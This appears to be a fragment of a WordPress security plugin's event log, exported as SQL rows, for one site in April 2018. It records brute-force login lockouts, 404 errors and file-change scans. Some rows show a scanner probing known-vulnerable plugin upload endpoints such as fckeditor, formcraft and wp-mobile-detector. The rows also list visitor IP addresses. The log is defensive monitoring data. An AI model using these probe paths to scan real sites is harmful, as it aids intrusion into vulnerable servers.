(85952, 'lockout', 'Host or User Lockout', 10, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-26 21:05:51";s:11:"expires_gmt";s:19:"2018-04-27 02:05:51";s:4:"type";s:11:"brute_force";}'),
(85951, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', 'admin', 0, '', '', 'a:0:{}'),
(85950, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', 'admin', 0, '', '', 'a:0:{}'),
(85949, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', 'admin', 0, '', '', 'a:0:{}'),
(85948, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', 'admin', 0, '', '', 'a:0:{}'),
(85947, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 20:50:51', '2018-04-27 01:50:51', '46.235.227.70', 'admin', 0, '', '', 'a:0:{}'),
(85946, 'four_oh_four', '404 Error', 3, '2018-04-26 20:29:40', '2018-04-27 01:29:40', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85945, 'four_oh_four', '404 Error', 3, '2018-04-26 20:28:07', '2018-04-27 01:28:07', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85944, 'four_oh_four', '404 Error', 3, '2018-04-26 20:27:38', '2018-04-27 01:27:38', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85943, 'four_oh_four', '404 Error', 3, '2018-04-26 20:24:47', '2018-04-27 01:24:47', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85942, 'four_oh_four', '404 Error', 3, '2018-04-26 20:18:01', '2018-04-27 01:18:01', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85941, 'four_oh_four', '404 Error', 3, '2018-04-26 19:47:19', '2018-04-27 00:47:19', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85940, 'four_oh_four', '404 Error', 3, '2018-04-26 19:32:55', '2018-04-27 00:32:55', '145.239.94.110', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85939, 'four_oh_four', '404 Error', 3, '2018-04-26 19:32:54', '2018-04-27 00:32:54', '145.239.94.110', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85938, 'four_oh_four', '404 Error', 3, '2018-04-26 19:31:35', '2018-04-27 00:31:35', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85937, 'four_oh_four', '404 Error', 3, '2018-04-26 19:30:31', '2018-04-27 00:30:31', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85936, 'four_oh_four', '404 Error', 3, '2018-04-26 19:09:37', '2018-04-27 00:09:37', '157.55.39.163', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85935, 'lockout', 'Host or User Lockout', 10, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-26 19:15:09";s:11:"expires_gmt";s:19:"2018-04-27 00:15:09";s:4:"type";s:11:"brute_force";}'),
(85934, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', 'admin', 0, '', '', 'a:0:{}'),
(85932, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', 'admin', 0, '', '', 'a:0:{}'),
(85933, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', 'admin', 0, '', '', 'a:0:{}'),
(85930, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', 'admin', 0, '', '', 'a:0:{}'),
(85931, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-26 19:00:09', '2018-04-27 00:00:09', '185.220.101.15', 'admin', 0, '', '', 'a:0:{}'),
(85929, 'four_oh_four', '404 Error', 3, '2018-04-26 19:00:03', '2018-04-27 00:00:03', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85928, 'four_oh_four', '404 Error', 3, '2018-04-26 18:56:14', '2018-04-26 23:56:14', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85927, 'four_oh_four', '404 Error', 3, '2018-04-26 18:48:27', '2018-04-26 23:48:27', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85926, 'four_oh_four', '404 Error', 3, '2018-04-26 18:40:48', '2018-04-26 23:40:48', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85925, 'four_oh_four', '404 Error', 3, '2018-04-26 18:37:40', '2018-04-26 23:37:40', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85924, 'four_oh_four', '404 Error', 3, '2018-04-26 18:37:39', '2018-04-26 23:37:39', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85923, 'four_oh_four', '404 Error', 3, '2018-04-26 18:37:37', '2018-04-26 23:37:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85922, 'four_oh_four', '404 Error', 3, '2018-04-26 18:37:36', '2018-04-26 23:37:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85921, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:16', '2018-04-26 23:10:16', '5.61.38.241', '', 0, '/fckeditor/editor/filemanager/connectors/php/upload.php', '', 'a:1:{s:12:"query_string";s:10:"Type=Media";}'),
(85920, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:15', '2018-04-26 23:10:15', '5.61.38.241', '', 0, '/wp-content/plugins/downloads-manager/img/unlock.gif', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85919, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:14', '2018-04-26 23:10:14', '5.61.38.241', '', 0, '/wp-content/plugins/category-page-icons/css/menu.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85918, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:09', '2018-04-26 23:10:09', '5.61.38.241', '', 0, '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85917, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:04', '2018-04-26 23:10:04', '5.61.38.241', '', 0, '/jm-ajax/upload_file/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85915, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:02', '2018-04-26 23:10:02', '5.61.38.241', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85916, 'four_oh_four', '404 Error', 3, '2018-04-26 18:10:03', '2018-04-26 23:10:03', '5.61.38.241', '', 0, '/wp-content/plugins/wp-mobile-detector/resize.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85914, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:58', '2018-04-26 23:09:58', '5.61.38.241', '', 0, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85913, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:57', '2018-04-26 23:09:57', '5.61.38.241', '', 0, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85912, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:56', '2018-04-26 23:09:56', '5.61.38.241', '', 0, '/wp-content/plugins/cherry-plugin/admin/import-export/settings_auto.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85911, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:51', '2018-04-26 23:09:51', '5.61.38.241', '', 0, '/wp-content/plugins/hd-webplayer/playlist.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85910, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:41', '2018-04-26 23:09:41', '5.61.38.241', '', 0, '/templates/system/css/system.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85909, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:40', '2018-04-26 23:09:40', '5.61.38.241', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85908, 'four_oh_four', '404 Error', 3, '2018-04-26 18:09:39', '2018-04-26 23:09:39', '5.61.38.241', '', 0, '/admin/images/cal_date_over.gif', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85907, 'four_oh_four', '404 Error', 3, '2018-04-26 17:54:03', '2018-04-26 22:54:03', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85905, 'four_oh_four', '404 Error', 3, '2018-04-26 17:24:47', '2018-04-26 22:24:47', '94.78.194.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85906, 'four_oh_four', '404 Error', 3, '2018-04-26 17:48:26', '2018-04-26 22:48:26', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85904, 'four_oh_four', '404 Error', 3, '2018-04-26 16:48:39', '2018-04-26 21:48:39', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85903, 'file_change', 'File Changes Detected', 8, '2018-04-26 16:43:35', '2018-04-26 21:43:35', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524771122";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524771122";}}s:6:"memory";s:4:"39.4";}'),
(85766, 'file_change', 'File Changes Detected', 8, '2018-04-25 16:43:18', '2018-04-25 21:43:18', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.43";}'),
(85767, 'four_oh_four', '404 Error', 3, '2018-04-25 16:53:10', '2018-04-25 21:53:10', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85768, 'four_oh_four', '404 Error', 3, '2018-04-25 16:56:02', '2018-04-25 21:56:02', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85769, 'four_oh_four', '404 Error', 3, '2018-04-25 17:17:38', '2018-04-25 22:17:38', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85770, 'four_oh_four', '404 Error', 3, '2018-04-25 17:19:14', '2018-04-25 22:19:14', '192.36.27.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85771, 'four_oh_four', '404 Error', 3, '2018-04-25 17:19:15', '2018-04-25 22:19:15', '192.36.27.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85772, 'four_oh_four', '404 Error', 3, '2018-04-25 17:19:17', '2018-04-25 22:19:17', '192.36.27.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85773, 'four_oh_four', '404 Error', 3, '2018-04-25 17:19:19', '2018-04-25 22:19:19', '192.36.27.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85774, 'four_oh_four', '404 Error', 3, '2018-04-25 17:45:29', '2018-04-25 22:45:29', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85775, 'four_oh_four', '404 Error', 3, '2018-04-25 18:14:42', '2018-04-25 23:14:42', '204.85.191.31', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85776, 'four_oh_four', '404 Error', 3, '2018-04-25 18:14:43', '2018-04-25 23:14:43', '204.85.191.31', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85777, 'four_oh_four', '404 Error', 3, '2018-04-25 18:14:45', '2018-04-25 23:14:45', '204.85.191.31', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85778, 'four_oh_four', '404 Error', 3, '2018-04-25 18:14:47', '2018-04-25 23:14:47', '204.85.191.31', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85779, 'four_oh_four', '404 Error', 3, '2018-04-25 18:30:45', '2018-04-25 23:30:45', '67.1.179.204', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85780, 'four_oh_four', '404 Error', 3, '2018-04-25 18:39:22', '2018-04-25 23:39:22', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85781, 'four_oh_four', '404 Error', 3, '2018-04-25 19:04:56', '2018-04-26 00:04:56', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85782, 'four_oh_four', '404 Error', 3, '2018-04-25 19:09:07', '2018-04-26 00:09:07', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85783, 'four_oh_four', '404 Error', 3, '2018-04-25 19:43:33', '2018-04-26 00:43:33', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85784, 'four_oh_four', '404 Error', 3, '2018-04-25 19:50:42', '2018-04-26 00:50:42', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85785, 'four_oh_four', '404 Error', 3, '2018-04-25 20:01:42', '2018-04-26 01:01:42', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85786, 'four_oh_four', '404 Error', 3, '2018-04-25 20:19:07', '2018-04-26 01:19:07', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85787, 'four_oh_four', '404 Error', 3, '2018-04-25 20:32:55', '2018-04-26 01:32:55', '204.44.125.160', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85788, 'four_oh_four', '404 Error', 3, '2018-04-25 20:32:56', '2018-04-26 01:32:56', '204.44.125.160', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85789, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', 'admin', 0, '', '', 'a:0:{}'),
(85790, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', 'admin', 0, '', '', 'a:0:{}'),
(85791, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', 'admin', 0, '', '', 'a:0:{}'),
(85792, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', 'admin', 0, '', '', 'a:0:{}'),
(85793, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', 'admin', 0, '', '', 'a:0:{}'),
(85794, 'lockout', 'Host or User Lockout', 10, '2018-04-25 21:00:52', '2018-04-26 02:00:52', '163.172.214.8', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-25 21:15:52";s:11:"expires_gmt";s:19:"2018-04-26 02:15:52";s:4:"type";s:11:"brute_force";}'),
(85795, 'four_oh_four', '404 Error', 3, '2018-04-25 21:28:33', '2018-04-26 02:28:33', '40.77.167.188', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85796, 'four_oh_four', '404 Error', 3, '2018-04-25 21:30:59', '2018-04-26 02:30:59', '173.208.36.40', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85797, 'four_oh_four', '404 Error', 3, '2018-04-25 21:31:00', '2018-04-26 02:31:00', '173.208.36.40', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85798, 'four_oh_four', '404 Error', 3, '2018-04-25 22:09:07', '2018-04-26 03:09:07', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85799, 'four_oh_four', '404 Error', 3, '2018-04-25 22:09:34', '2018-04-26 03:09:34', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85800, 'four_oh_four', '404 Error', 3, '2018-04-25 22:36:12', '2018-04-26 03:36:12', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85801, 'four_oh_four', '404 Error', 3, '2018-04-25 22:37:26', '2018-04-26 03:37:26', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85802, 'four_oh_four', '404 Error', 3, '2018-04-25 23:13:44', '2018-04-26 04:13:44', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85803, 'four_oh_four', '404 Error', 3, '2018-04-25 23:20:18', '2018-04-26 04:20:18', '85.236.18.156', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85804, 'four_oh_four', '404 Error', 3, '2018-04-25 23:20:40', '2018-04-26 04:20:40', '85.236.18.156', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85805, 'four_oh_four', '404 Error', 3, '2018-04-25 23:42:52', '2018-04-26 04:42:52', '116.68.105.163', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85806, 'four_oh_four', '404 Error', 3, '2018-04-26 00:54:31', '2018-04-26 05:54:31', '219.131.85.139', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85807, 'four_oh_four', '404 Error', 3, '2018-04-26 00:54:32', '2018-04-26 05:54:32', '219.131.85.139', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85808, 'four_oh_four', '404 Error', 3, '2018-04-26 01:02:34', '2018-04-26 06:02:34', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85809, 'four_oh_four', '404 Error', 3, '2018-04-26 01:02:35', '2018-04-26 06:02:35', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85810, 'four_oh_four', '404 Error', 3, '2018-04-26 01:11:42', '2018-04-26 06:11:42', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85811, 'four_oh_four', '404 Error', 3, '2018-04-26 01:15:01', '2018-04-26 06:15:01', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85812, 'four_oh_four', '404 Error', 3, '2018-04-26 01:15:03', '2018-04-26 06:15:03', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85813, 'four_oh_four', '404 Error', 3, '2018-04-26 01:15:05', '2018-04-26 06:15:05', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85814, 'four_oh_four', '404 Error', 3, '2018-04-26 01:15:06', '2018-04-26 06:15:06', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85815, 'four_oh_four', '404 Error', 3, '2018-04-26 01:24:20', '2018-04-26 06:24:20', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85816, 'four_oh_four', '404 Error', 3, '2018-04-26 01:29:41', '2018-04-26 06:29:41', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85817, 'four_oh_four', '404 Error', 3, '2018-04-26 02:04:19', '2018-04-26 07:04:19', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85818, 'four_oh_four', '404 Error', 3, '2018-04-26 02:04:31', '2018-04-26 07:04:31', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85819, 'four_oh_four', '404 Error', 3, '2018-04-26 02:04:31', '2018-04-26 07:04:31', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85820, 'four_oh_four', '404 Error', 3, '2018-04-26 02:31:25', '2018-04-26 07:31:25', '85.185.81.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85821, 'four_oh_four', '404 Error', 3, '2018-04-26 02:31:27', '2018-04-26 07:31:27', '85.185.81.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85822, 'four_oh_four', '404 Error', 3, '2018-04-26 02:32:09', '2018-04-26 07:32:09', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85823, 'four_oh_four', '404 Error', 3, '2018-04-26 02:32:42', '2018-04-26 07:32:42', '105.102.149.237', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85824, 'four_oh_four', '404 Error', 3, '2018-04-26 02:37:25', '2018-04-26 07:37:25', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85825, 'four_oh_four', '404 Error', 3, '2018-04-26 03:01:17', '2018-04-26 08:01:17', '66.249.69.96', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85826, 'four_oh_four', '404 Error', 3, '2018-04-26 03:25:59', '2018-04-26 08:25:59', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85827, 'four_oh_four', '404 Error', 3, '2018-04-26 04:19:09', '2018-04-26 09:19:09', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85828, 'four_oh_four', '404 Error', 3, '2018-04-26 04:20:40', '2018-04-26 09:20:40', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85829, 'four_oh_four', '404 Error', 3, '2018-04-26 05:27:39', '2018-04-26 10:27:39', '158.69.244.200', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85830, 'four_oh_four', '404 Error', 3, '2018-04-26 05:27:40', '2018-04-26 10:27:40', '158.69.244.200', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85831, 'four_oh_four', '404 Error', 3, '2018-04-26 05:32:55', '2018-04-26 10:32:55', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85832, 'four_oh_four', '404 Error', 3, '2018-04-26 05:32:56', '2018-04-26 10:32:56', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85833, 'four_oh_four', '404 Error', 3, '2018-04-26 05:32:59', '2018-04-26 10:32:59', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85834, 'four_oh_four', '404 Error', 3, '2018-04-26 05:32:59', '2018-04-26 10:32:59', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85835, 'four_oh_four', '404 Error', 3, '2018-04-26 05:52:29', '2018-04-26 10:52:29', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85836, 'four_oh_four', '404 Error', 3, '2018-04-26 06:06:36', '2018-04-26 11:06:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85837, 'four_oh_four', '404 Error', 3, '2018-04-26 06:06:37', '2018-04-26 11:06:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85838, 'four_oh_four', '404 Error', 3, '2018-04-26 06:06:39', '2018-04-26 11:06:39', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85839, 'four_oh_four', '404 Error', 3, '2018-04-26 06:06:40', '2018-04-26 11:06:40', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85840, 'four_oh_four', '404 Error', 3, '2018-04-26 07:09:04', '2018-04-26 12:09:04', '94.55.33.80', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85841, 'four_oh_four', '404 Error', 3, '2018-04-26 08:18:01', '2018-04-26 13:18:01', '213.44.207.115', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85842, 'four_oh_four', '404 Error', 3, '2018-04-26 08:48:24', '2018-04-26 13:48:24', '159.65.186.217', '', 0, '/price', 'http://clearyourbeliefs.com/author/geri/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85843, 'four_oh_four', '404 Error', 3, '2018-04-26 08:48:29', '2018-04-26 13:48:29', '159.65.186.217', '', 0, '/contacts', 'http://clearyourbeliefs.com/author/geri/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85844, 'four_oh_four', '404 Error', 3, '2018-04-26 09:10:04', '2018-04-26 14:10:04', '46.109.20.103', '', 0, '/wp-content/plugins/gravityforms/css/preview.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85845, 'four_oh_four', '404 Error', 3, '2018-04-26 09:38:49', '2018-04-26 14:38:49', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85846, 'four_oh_four', '404 Error', 3, '2018-04-26 09:40:31', '2018-04-26 14:40:31', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85847, 'four_oh_four', '404 Error', 3, '2018-04-26 09:40:32', '2018-04-26 14:40:32', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85848, 'four_oh_four', '404 Error', 3, '2018-04-26 09:40:34', '2018-04-26 14:40:34', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85849, 'four_oh_four', '404 Error', 3, '2018-04-26 09:40:35', '2018-04-26 14:40:35', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85850, 'four_oh_four', '404 Error', 3, '2018-04-26 09:41:19', '2018-04-26 14:41:19', '159.65.186.217', '', 0, '/kupit-diplom-o-vysshem-obrazovanii', 'http://clearyourbeliefs.com/author/geri/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85851, 'four_oh_four', '404 Error', 3, '2018-04-26 09:57:33', '2018-04-26 14:57:33', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85852, 'four_oh_four', '404 Error', 3, '2018-04-26 10:00:31', '2018-04-26 15:00:31', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85853, 'four_oh_four', '404 Error', 3, '2018-04-26 10:07:25', '2018-04-26 15:07:25', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85854, 'four_oh_four', '404 Error', 3, '2018-04-26 10:07:43', '2018-04-26 15:07:43', '187.64.26.12', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
